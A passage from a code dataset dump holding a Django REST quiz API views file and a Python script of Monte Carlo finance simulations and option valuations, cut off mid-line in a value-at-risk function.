"stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.cm", "line_number": 15, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.ylabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 48, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 48, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 62, "usage_type": "call"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 110, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 133, "usage_type": "call"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 136, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 137, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 137, "usage_type": "name"}, 
{"api_name": "os.makedirs", "line_number": 151, "usage_type": "call"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 152, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 163, "usage_type": "call"}]}
+{"seq_id": "12058641821", "text": "# from django.shortcuts import render\nfrom datetime import datetime\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Answer, Quiz, Question\nfrom .serializers import QuizSerializer, QuestionSerializer, AnswerSerializer\n\nclass QuizView(APIView):\n def get(self, request):\n quizes = Quiz.objects.all()\n serializer = QuizSerializer(quizes, many=True)\n\n return Response({\"quizes\": serializer.data})\n\n\nclass QuestionView(APIView):\n def get(self, request):\n quiz_id = request.data.get('quiz_id')\n\n # If quiz_id is uncorrect\n if quiz_id is None:\n return Response({\"error\": \"quiz_id undefined\"}, status=400)\n\n # Get all questions from quiz\n questions = Question.objects.filter(quiz_id=quiz_id)\n serializer = QuestionSerializer(questions, many=True)\n\n return Response({\"questions\": serializer.data})\n\n\nclass AnswerView(APIView):\n def post(self, request):\n user_id = request.data.get('user_id')\n question_id = request.data.get('question_id')\n text = request.data.get('text')\n\n # If user don't send one of the required data\n if (user_id is None) or (question_id is None) or (text is None): \n return Response({\"error\": \"undefined value, check what you are sending user_id, question_id and text\"}, status=400)\n\n # Try get question from Question\n try:\n question = Question.objects.get(id=question_id)\n except Question.DoesNotExist: # If question_id is uncorrect\n return Response({\"error\": \"not valid question_id\"}, status=400)\n\n # Try get answer from Answer that check if the user has already sent a response\n try:\n answer = Answer.objects.get(user_id=user_id, question_id=question_id)\n return Response({\"error\": \"you already sent a reply\"}, status=400)\n except Answer.DoesNotExist: # If user didn't respond, just skip it \n pass\n\n serializer = QuestionSerializer(question, many=False)\n quiz_id = serializer.data['quiz_id'] # Get quiz_id for save answer\n type = serializer.data['type'] # Get type for check what the user send\n\n # Get quiz for check date_ended and date_started\n quiz = Quiz.objects.get(id=quiz_id)\n serializer = QuizSerializer(quiz, many=False)\n date_started = serializer.data['date_started']\n date_ended = serializer.data['date_ended']\n date_now = datetime.now()\n\n # Convert str to datetime\n date_started = datetime.strptime(date_started, '%d-%m-%Y')\n date_ended = datetime.strptime(date_ended, '%d-%m-%Y')\n\n if date_now < date_started: # If quiz not started\n return Response({\"error\": \"quiz not started yet\"}, status=400)\n elif date_now > date_ended: # If quiz alreade ended\n return Response({\"error\": \"quiz has already ended\"}, status=400)\n\n # If the answer to the question can only be numeric \n if type == '2' or type == '3':\n if text.isdigit() is False: # If the text is not a numeric\n return Response({\"error\": \"question supports only numeric answer\"}, status=400)\n\n # Add answer\n answer = Answer(user_id=user_id, quiz_id=quiz_id, question_id=question_id, text=text)\n answer.save()\n\n return Response({\"success\": \"answer added\"})\n\n\nclass UserView(APIView):\n def get(self, request):\n user_id = request.data.get('user_id')\n quiz_id = request.data.get('quiz_id')\n\n # If user don't send one of the required data\n if (user_id is None) or (quiz_id is None): \n return Response({\"error\": \"undefined value, check what you are sending user_id and quiz_id\"}, status=400)\n\n # Get all answers from Answer\n answers = 
Answer.objects.filter(user_id=user_id, quiz_id=quiz_id)\n serializer = AnswerSerializer(answers, many=True)\n\n return Response({\"answers\": serializer.data})", "repo_name": "Blazzerrr/Quiz", "sub_path": "restapi/quiz/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 8, "usage_type": "name"}, {"api_name": "models.Quiz.objects.all", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Quiz.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "models.Quiz", "line_number": 10, "usage_type": "name"}, {"api_name": "serializers.QuizSerializer", "line_number": 11, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 16, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 22, "usage_type": "call"}, {"api_name": "models.Question.objects.filter", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 25, "usage_type": "name"}, {"api_name": "serializers.QuestionSerializer", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 28, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 31, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Question.objects.get", "line_number": 43, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 43, "usage_type": "name"}, {"api_name": "models.Question.DoesNotExist", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 44, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Answer.objects.get", "line_number": 49, "usage_type": "call"}, {"api_name": "models.Answer.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "models.Answer", "line_number": 49, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 50, "usage_type": "call"}, {"api_name": "models.Answer.DoesNotExist", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models.Answer", "line_number": 51, "usage_type": "name"}, {"api_name": "serializers.QuestionSerializer", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Quiz.objects.get", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Quiz.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Quiz", "line_number": 59, "usage_type": "name"}, {"api_name": "serializers.QuizSerializer", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 66, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", 
"line_number": 67, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 70, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 72, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 77, "usage_type": "call"}, {"api_name": "models.Answer", "line_number": 80, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 83, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 86, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 93, "usage_type": "call"}, {"api_name": "models.Answer.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "models.Answer.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "models.Answer", "line_number": 96, "usage_type": "name"}, {"api_name": "serializers.AnswerSerializer", "line_number": 97, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 99, "usage_type": "call"}]}
+{"seq_id": "31313807187", "text": "import sys, pdb\nsys.path.append('/usr/share/doc')\nsys.path.append(\"/usr/lib/python3/dist-packages\")\nsys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\nimport matplotlib as mpl\nmpl.use('Agg')\nimport numpy as np\nimport numpy.random as npr\nimport matplotlib.pyplot as plt\nimport scipy.stats as scs\nfrom utils import timeme\n\nPATH = '/home/ubuntu/workspace/python_for_finance/png/book_examples/ch10/'\n\ndef randon_nums():\n print(npr.rand(10))\n print(npr.rand(5, 5))\n a = 5.\n b = 10.\n print(npr.rand(10) * (b - a) + a)\n print(npr.rand(5, 5) * (b - a) + a)\n sample_size = 500\n rn1 = npr.rand(sample_size, 3)\n rn2 = npr.randint(0, 10, sample_size)\n rn3 = npr.sample(size=sample_size)\n a = [0, 25, 50, 75, 100]\n rn4 = npr.choice(a, size=sample_size)\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2,\n figsize=(7, 7))\n ax1.hist(rn1, bins=25, stacked=True)\n ax1.set_title('rand')\n ax1.set_ylabel('frequency')\n ax1.grid(True)\n ax2.hist(rn2, bins=25)\n ax2.set_title('randint')\n ax2.grid(True)\n ax3.hist(rn3, bins=25)\n ax3.set_title('sample')\n ax3.set_ylabel('frequency')\n ax3.grid(True)\n ax4.hist(rn4, bins=25)\n ax4.set_title('choice')\n ax4.grid(True)\n plt.savefig(PATH + 'rand1.png', dpi=300)\n plt.close()\n\n sample_size = 500\n rn1 = npr.standard_normal(sample_size)\n rn2 = npr.normal(100, 20, sample_size)\n rn3 = npr.chisquare(df=0.5, size=sample_size)\n rn4 = npr.poisson(lam=1.0, size=sample_size)\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2, figsize=(7, 7))\n ax1.hist(rn1, bins=25)\n ax1.set_title('standard normal')\n ax1.set_ylabel('frequency')\n ax1.grid(True)\n ax2.hist(rn2, bins=25)\n ax2.set_title('normal(100, 20)')\n ax2.grid(True)\n ax3.hist(rn3, bins=25)\n ax3.set_title('chi square')\n ax3.set_ylabel('frequency')\n ax3.grid(True)\n ax4.hist(rn4, bins=25)\n ax4.set_title('Poisson')\n ax4.grid(True)\n plt.savefig(PATH + 'rand2.png', dpi=300)\n plt.close()\n\ndef rand_vals():\n S0 = 100 # initial value\n r = 0.05 # constant short rate\n sigma = 0.25 # constant volatility\n T = 2.0 # in years\n I = 10000 # number of random draws\n ST1 = S0 * np.exp((r - 0.5 * sigma ** 2) * T \n + sigma * np.sqrt(T) * npr.standard_normal(I))\n plt.hist(ST1, bins=50)\n plt.xlabel('index level')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'rand_vals1.png', dpi=300)\n plt.close()\n \n ST2 = S0 * npr.lognormal((r - 0.5 * sigma ** 2) * T,\n sigma * np.sqrt(T), size=I)\n plt.hist(ST2, bins=50)\n plt.xlabel('index level')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'rand_vals2.png', dpi=300)\n plt.close()\n print_statistics(ST1, ST2)\n \ndef print_statistics(a1, a2):\n ''' Prints selected statistics.\n \n Parameters\n ==========\n a1, a2 : ndarray objects\n results object from simulation\n '''\n sta1 = scs.describe(a1)\n sta2 = scs.describe(a2)\n print(\"%14s %14s %14s\" % \n ('statistic', 'data set 1', 'data set 2'))\n print(45 * \"-\")\n print(\"%14s %14.3f %14.3f\" % ('size', sta1[0], sta2[0]))\n print(\"%14s %14.3f %14.3f\" % ('min', sta1[1][0], sta2[1][0]))\n print(\"%14s %14.3f %14.3f\" % ('max', sta1[1][1], sta2[1][1]))\n print(\"%14s %14.3f %14.3f\" % ('mean', sta1[2], sta2[2]))\n print(\"%14s %14.3f %14.3f\" % ('std', np.sqrt(sta1[3]), np.sqrt(sta2[3])))\n print(\"%14s %14.3f %14.3f\" % ('skew', sta1[4], sta2[4]))\n print(\"%14s %14.3f %14.3f\" % ('kurtosis', sta1[5], sta2[5]))\n \ndef stochastic_procs():\n 
I = 10000\n M = 50\n T = 2.0 # in years\n S0 = 100 # initial value\n r = 0.05 # constant short rate\n sigma = 0.25 # constant volatility\n dt = T / M\n S = np.zeros((M + 1, I))\n S[0] = S0\n ST1 = S0 * np.exp((r - 0.5 * sigma ** 2) * T \n + sigma * np.sqrt(T) * npr.standard_normal(I))\n ST2 = S0 * npr.lognormal((r - 0.5 * sigma ** 2) * T,\n sigma * np.sqrt(T), size=I)\n \n # Geometric Brownian motion\n for t in range(1, M + 1):\n S[t] = S[t - 1] * np.exp((r - 0.5 * sigma ** 2) * dt \n + sigma * np.sqrt(dt) * npr.standard_normal(I))\n plt.hist(S[-1], bins=50)\n plt.xlabel('index level')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'stoch_procs1.png', dpi=300)\n plt.close()\n\n print_statistics(S[-1], ST2)\n \n plt.plot(S[:, :10], lw=1.5)\n plt.xlabel('time')\n plt.ylabel('index level')\n plt.grid(True)\n plt.savefig(PATH + 'stoch_procs2.png', dpi=300)\n plt.close()\n\ndef sqr_rt_diffusion():\n T = 2.0 # in years\n x0 = 0.05\n kappa = 3.0\n theta = 0.02\n sigma = 0.1\n I = 10000\n M = 50\n dt = T / M\n x1 = srd_euler()\n plt.hist(x1[-1], bins=50)\n plt.xlabel('value')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'sqr_rt1.png', dpi=300)\n plt.close()\n \n plt.plot(x1[:, :10], lw=1.5)\n plt.xlabel('time')\n plt.ylabel('index level')\n plt.grid(True)\n plt.savefig(PATH + 'sqr_rt2.png', dpi=300)\n plt.close()\n \n x2 = srd_exact()\n plt.hist(x2[-1], bins=50)\n plt.xlabel('value')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'sqr_rt3.png', dpi=300)\n plt.close()\n \n plt.plot(x2[:, :10], lw=1.5)\n plt.xlabel('time')\n plt.ylabel('index level')\n plt.grid(True)\n plt.savefig(PATH + 'sqr_rt4.png', dpi=300)\n plt.close()\n\n print_statistics(x1[-1], x2[-1])\n I = 250000\n x1 = timeme(srd_euler)()\n x2 = timeme(srd_exact)()\n print_statistics(x1[-1], x2[-1])\n\ndef srd_euler():\n T = 2.0 # in years\n x0 = 0.05\n kappa = 3.0\n theta = 0.02\n sigma = 0.1\n I = 10000\n M = 50\n dt = T / M\n xh = np.zeros((M + 1, I))\n x1 = np.zeros_like(xh)\n xh[0] = x0\n x1[0] = x0\n for t in range(1, M + 1):\n xh[t] = (xh[t - 1]\n + kappa * (theta - np.maximum(xh[t - 1], 0)) * dt\n + sigma * np.sqrt(np.maximum(xh[t - 1], 0)) * np.sqrt(dt) \n * npr.standard_normal(I))\n x1 = np.maximum(xh, 0)\n return x1\n\ndef srd_exact():\n T = 2.0 # in years\n x0 = 0.05\n kappa = 3.0\n theta = 0.02\n sigma = 0.1\n I = 10000\n M = 50\n dt = T / M\n x2 = np.zeros((M + 1, I))\n x2[0] = x0\n for t in range(1, M + 1):\n df = 4 * theta * kappa / sigma ** 2\n c = (sigma ** 2 * (1 - np.exp(-kappa * dt))) / (4 * kappa)\n nc = np.exp(-kappa * dt) / c * x2[t - 1] \n x2[t] = c * npr.noncentral_chisquare(df, nc, size=I)\n return x2\n \ndef stoch_vol():\n S0 = 100.\n r = 0.05\n v0 = 0.1\n kappa = 3.0\n theta = 0.25\n sigma = 0.1\n rho = 0.6\n T = 1.0\n corr_mat = np.zeros((2, 2))\n corr_mat[0, :] = [1.0, rho]\n corr_mat[1, :] = [rho, 1.0]\n cho_mat = np.linalg.cholesky(corr_mat)\n print(cho_mat)\n M = 50\n I = 10000\n ran_num = npr.standard_normal((2, M + 1, I))\n dt = T / M\n v = np.zeros_like(ran_num[0])\n vh = np.zeros_like(v)\n v[0] = v0\n vh[0] = v0\n for t in range(1, M + 1):\n ran = np.dot(cho_mat, ran_num[:, t, :])\n vh[t] = (vh[t - 1] + kappa * (theta - np.maximum(vh[t - 1], 0)) * dt\n + sigma * np.sqrt(np.maximum(vh[t - 1], 0)) * np.sqrt(dt) \n * ran[1])\n v = np.maximum(vh, 0)\n S = np.zeros_like(ran_num[0])\n S[0] = S0\n for t in range(1, M + 1):\n ran = np.dot(cho_mat, ran_num[:, t, :])\n S[t] = S[t - 1] * np.exp((r - 0.5 * v[t]) * dt +\n np.sqrt(v[t]) * ran[0] * 
np.sqrt(dt))\n\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(9, 5))\n ax1.hist(S[-1], bins=50)\n ax1.set_xlabel('index level')\n ax1.set_ylabel('frequency')\n ax1.grid(True)\n ax2.hist(v[-1], bins=50)\n ax2.set_xlabel('volatility')\n ax2.grid(True)\n plt.savefig(PATH + 'stoch_vol1.png', dpi=300)\n plt.close()\n\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, figsize=(7, 6))\n ax1.plot(S[:, :10], lw=1.5)\n ax1.set_ylabel('index level')\n ax1.grid(True)\n ax2.plot(v[:, :10], lw=1.5)\n ax2.set_xlabel('time')\n ax2.set_ylabel('volatility')\n ax2.grid(True)\n plt.savefig(PATH + 'stoch_vol2.png', dpi=300)\n plt.close()\n print_statistics(S[-1], v[-1])\n \ndef jump_diffusion():\n S0 = 100.\n r = 0.05\n sigma = 0.2\n lamb = 0.75\n mu = -0.6\n delta = 0.25\n T = 1.0\n M = 50\n I = 10000\n dt = T / M\n rj = lamb * (np.exp(mu + 0.5 * delta ** 2) - 1)\n S = np.zeros((M + 1, I))\n S[0] = S0\n sn1 = npr.standard_normal((M + 1, I))\n sn2 = npr.standard_normal((M + 1, I))\n poi = npr.poisson(lamb * dt, (M + 1, I))\n for t in range(1, M + 1, 1):\n S[t] = S[t - 1] * (np.exp((r - rj - 0.5 * sigma ** 2) * dt\n + sigma * np.sqrt(dt) * sn1[t])\n + (np.exp(mu + delta * sn2[t]) - 1)\n * poi[t])\n S[t] = np.maximum(S[t], 0)\n \n plt.hist(S[-1], bins=50)\n plt.xlabel('value')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'jump_diff1.png', dpi=300)\n plt.close()\n\n plt.plot(S[:, :10], lw=1.5)\n plt.xlabel('time')\n plt.ylabel('index level')\n plt.grid(True)\n plt.savefig(PATH + 'jump_diff2.png', dpi=300)\n plt.close()\n\ndef var_reduction():\n print(\"%15s %15s\" % ('Mean', 'Std. Deviation'))\n print(31 * \"-\")\n for i in range(1, 31, 2):\n npr.seed(1000)\n sn = npr.standard_normal(i ** 2 * 10000)\n print(\"%15.12f %15.12f\" % (sn.mean(), sn.std()))\n\n print(i ** 2 * 10000)\n sn = npr.standard_normal(int(10000 / 2))\n sn = np.concatenate((sn, -sn))\n print(np.shape(sn))\n print(\"%15s %15s\" % ('Mean', 'Std. 
Deviation'))\n    print(31 * \"-\")\n    for i in range(1, 31, 2):\n        npr.seed(1000)\n        sn = npr.standard_normal(i ** 2 * int(10000 / 2))\n        sn = np.concatenate((sn, -sn))\n        print(\"%15.12f %15.12f\" % (sn.mean(), sn.std()))\n    sn = npr.standard_normal(10000)\n    print(sn.mean())\n    print(sn.std())\n    sn_new = (sn - sn.mean()) / sn.std()\n    print(sn_new.mean())\n    print(sn_new.std())\n    print(gen_sn(50, 10000))\n    print(gen_sn(50, 10000, anti_paths=False))\n    print(gen_sn(50, 10000, anti_paths=False, mo_match=False))\n    print(gen_sn(50, 10000, mo_match=False))\n\ndef gen_sn(M, I, anti_paths=True, mo_match=True):\n    ''' Function to generate random numbers for simulation.\n    \n    Parameters\n    ==========\n    M : int\n        number of time intervals for discretization\n    I : int\n        number of paths to be simulated\n    anti_paths : boolean\n        use of antithetic variates\n    mo_match : boolean\n        use of moment matching\n    '''\n    if anti_paths is True:\n        sn = npr.standard_normal((M + 1, int(I / 2)))\n        sn = np.concatenate((sn, -sn), axis=1)\n    else:\n        sn = npr.standard_normal((M + 1, I))\n    if mo_match is True:\n        sn = (sn - sn.mean()) / sn.std()\n    return sn\n    \ndef valuation():\n    from bsm_functions import bsm_call_value\n    S0 = 100.\n    r = 0.05\n    sigma = 0.25\n    T = 1.0\n    I = 5000\n    M = 50\n    print(gbm_mcs_stat(K=105.))\n    print(gbm_mcs_dyna(K=110., option='call'))\n    print(gbm_mcs_dyna(K=110., option='put'))\n    \n    stat_res = []\n    dyna_res = []\n    anal_res = []\n    k_list = np.arange(80., 120.1, 5.)\n    np.random.seed(200000)\n    for K in k_list:\n        stat_res.append(gbm_mcs_stat(K))\n        dyna_res.append(gbm_mcs_dyna(K))\n        anal_res.append(bsm_call_value(S0, K, T, r, sigma))\n    stat_res = np.array(stat_res)\n    dyna_res = np.array(dyna_res)\n    anal_res = np.array(anal_res)\n    \n    fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, figsize=(8, 6))\n    ax1.plot(k_list, anal_res, 'b', label='analytical')\n    ax1.plot(k_list, stat_res, 'ro', label='static')\n    ax1.set_ylabel('European call option value')\n    ax1.grid(True)\n    ax1.legend(loc=0)\n    ax1.set_ylim(ymin=0)\n    wi = 1.0\n    ax2.bar(k_list - wi / 2, (anal_res - stat_res) / anal_res * 100, wi)\n    ax2.set_xlabel('strike')\n    ax2.set_ylabel('difference in %')\n    ax2.set_xlim(left=75, right=125)\n    ax2.grid(True)\n    plt.savefig(PATH + 'valuation1.png', dpi=300)\n    plt.close()\n    \n    fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, figsize=(8, 6))\n    ax1.plot(k_list, anal_res, 'b', label='analytical')\n    ax1.plot(k_list, dyna_res, 'ro', label='dynamic')\n    ax1.set_ylabel('European call option value')\n    ax1.grid(True)\n    ax1.legend(loc=0)\n    ax1.set_ylim(ymin=0)\n\n    wi = 1.0\n    ax2.bar(k_list - wi / 2, (anal_res - dyna_res) / anal_res * 100, wi)\n    ax2.set_xlabel('strike')\n    ax2.set_ylabel('difference in %')\n    ax2.set_xlim(left=75, right=125)\n    ax2.grid(True)\n    plt.savefig(PATH + 'valuation2.png', dpi=300)\n    plt.close()\n    \n    print(gbm_mcs_amer(110., option='call'))\n    print(gbm_mcs_amer(110., option='put'))\n    euro_res = []\n    amer_res = []\n    k_list = np.arange(80., 120.1, 5.)\n    for K in k_list:\n        euro_res.append(gbm_mcs_dyna(K, 'put'))\n        amer_res.append(gbm_mcs_amer(K, 'put'))\n    euro_res = np.array(euro_res)\n    amer_res = np.array(amer_res)\n\n    fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, figsize=(8, 6))\n    ax1.plot(k_list, euro_res, 'b', label='European put')\n    ax1.plot(k_list, amer_res, 'ro', label='American put')\n    ax1.set_ylabel('call option value')\n    ax1.grid(True)\n    ax1.legend(loc=0)\n    \n    wi = 1.0\n    ax2.bar(k_list - wi / 2, (amer_res - euro_res) / euro_res * 100, wi)\n    ax2.set_xlabel('strike')\n    ax2.set_ylabel('early exercise premium in %')\n    
ax2.set_xlim(left=75, right=125)\n ax2.grid(True)\n plt.savefig(PATH + 'valuation3.png', dpi=300)\n plt.close()\n\ndef gbm_mcs_stat(K):\n ''' Valuation of European call option in Black-Scholes-Merton\n by Monte Carlo simulation (of index level at maturity)\n \n Parameters\n ==========\n K : float\n (positive) strike price of the option\n \n Returns\n =======\n C0 : float\n estimated present value of European call option\n '''\n S0 = 100.\n r = 0.05\n sigma = 0.25\n T = 1.0\n I = 50000\n sn = gen_sn(1, I)\n # simulate index level at maturity\n ST = S0 * np.exp((r - 0.5 * sigma ** 2) * T \n + sigma * np.sqrt(T) * sn[1])\n # calculate payoff at maturity\n hT = np.maximum(ST - K, 0)\n # calculate MCS estimator\n C0 = np.exp(-r * T) * 1 / I * np.sum(hT)\n return C0\n\ndef gbm_mcs_dyna(K, option='call'):\n ''' Valuation of European options in Black-Scholes-Merton\n by Monte Carlo simulation (of index level paths)\n \n Parameters\n ==========\n K : float\n (positive) strike price of the option\n option : string\n type of the option to be valued ('call', 'put')\n \n Returns\n =======\n C0 : float\n estimated present value of European call option\n '''\n S0 = 100.\n r = 0.05\n sigma = 0.25\n T = 1.0\n I = 50000\n M = 50\n dt = T / M\n # simulation of index level paths\n S = np.zeros((M + 1, I))\n S[0] = S0\n sn = gen_sn(M, I)\n for t in range(1, M + 1):\n S[t] = S[t - 1] * np.exp((r - 0.5 * sigma ** 2) * dt \n + sigma * np.sqrt(dt) * sn[t])\n # case-based calculation of payoff\n if option == 'call':\n hT = np.maximum(S[-1] - K, 0)\n else:\n hT = np.maximum(K - S[-1], 0)\n # calculation of MCS estimator\n C0 = np.exp(-r * T) * 1 / I * np.sum(hT)\n return C0\n\ndef gbm_mcs_amer(K, option='call'):\n ''' Valuation of American option in Black-Scholes-Merton\n by Monte Carlo simulation by LSM algorithm\n \n Parameters\n ==========\n K : float\n (positive) strike price of the option\n option : string\n type of the option to be valued ('call', 'put')\n \n Returns\n =======\n C0 : float\n estimated present value of European call option\n '''\n S0 = 100.\n r = 0.05\n sigma = 0.25\n T = 1.0\n I = 50000\n M = 50\n dt = T / M\n df = np.exp(-r * dt)\n # simulation of index levels\n S = np.zeros((M + 1, I))\n S[0] = S0\n sn = gen_sn(M, I)\n for t in range(1, M + 1):\n S[t] = S[t - 1] * np.exp((r - 0.5 * sigma ** 2) * dt \n + sigma * np.sqrt(dt) * sn[t])\n # case based calculation of payoff\n if option == 'call':\n h = np.maximum(S - K, 0)\n else:\n h = np.maximum(K - S, 0)\n # LSM algorithm\n V = np.copy(h)\n for t in range(M - 1, 0, -1):\n reg = np.polyfit(S[t], V[t + 1] * df, 7)\n C = np.polyval(reg, S[t])\n V[t] = np.where(C > h[t], V[t + 1] * df, h[t])\n # MCS estimator\n C0 = df * 1 / I * np.sum(V[1])\n return C0\n\ndef VaR():\n S0 = 100\n r = 0.05\n sigma = 0.25\n T = 30 / 365.\n I = 10000\n mu = -0.6\n delta = 0.25\n lamb = 0.75\n M = 50\n ST = S0 * np.exp((r - 0.5 * sigma ** 2) 